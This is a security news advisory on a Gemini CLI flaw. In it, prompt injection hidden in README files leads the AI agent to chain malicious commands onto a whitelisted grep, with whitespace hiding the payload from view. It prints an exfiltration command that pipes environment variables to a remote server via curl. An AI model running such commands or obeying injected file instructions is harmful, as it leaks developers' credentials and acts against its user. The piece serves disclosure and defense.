Gemini CLI vulnerability enables silent code execution via prompt injection
Take action: If you're using Google's Gemini CLI tool, immediately upgrade to version 0.1.14 or later. When using any AI development tools, always run them in sandboxed environments and avoid using them on untrusted code repositories. Ideally, don't rush into using AI development tools which have access to live systems (even your own laptop). The AI tooling is not mature, and is very prone to being exploited.
Learn More
Cybersecurity firm Tracebit is reporting a critical vulnerability in Google's Gemini CLI tool that enables attackers to silently execute arbitrary malicious commands on developers' systems through a combination of prompt injection, inadequate input validation, and misleading user interface design.
Gemini CLI, released as an open-source AI agent intended to streamline coding workflows, enable developers to interact with Google's Gemini AI directly from their command line. The tool supports executing shell commands, loading project files into context, and making code recommendations through natural language interactions.
The flaw was discovered just two days after Gemini CLI's initial release on June 25, 2025. The vulnerability doesn't have a CVE designation and CVSS scoring, but Google classified it internally as a Priority 1, Severity 1 issue. The cause of the vulnerability is inadequate command validation when comparing shell inputs against a set of whitelisted commands. The original implementation failed to correctly parse complex shell command strings, allowing attackers to append malicious payloads after approved commands.
For instance, a whitelisted grep command could be exploited using commands like grep Install README.md | head -n 3; env | curl --silent -X POST --data-binary @- http://remote.server:8083, which would execute normally as a grep operation but also exfiltrate all environment variables, potentially containing sensitive credentials, to an attacker-controlled server.
The attack's most dangerous aspect is its complete invisibility to victims, allowing malicious commands to execute without any indication of compromise.
The exploitation technique manipulates Gemini CLI's command whitelisting mechanism.
- Attackers would prompt Gemini to request execution of innocuous commands like
grep ^Setup README.mdto search for setup instructions. - Attackers conceal malicious instructions within seemingly benign files, particularly README.md files containing the GNU Public License text, where experienced developers would be unlikely to read beyond the opening lines but Gemini would process the entire content.
- By inserting large numbers of whitespace characters within commands, attackers could obscure malicious payloads from display, ensuring that while malicious code executed successfully, users would only see the benign portion of the command in their interface.
All versions from the initial release on June 25, 2025, up to but not including version 0.1.14 were vulnerable to this exploitation technique.
Google released a fixed version 0.1.14 on July 25, 2025. During the month between initial release and patch deployment, several independent security researchers discovered similar vulnerabilities.
Users are advised to immediately upgrade to Gemini CLI version 0.1.14 or later. Organizations should implement sandboxing modes whenever possible when utilizing AI agents and exercise caution when using AI development tools on untrusted code repositories.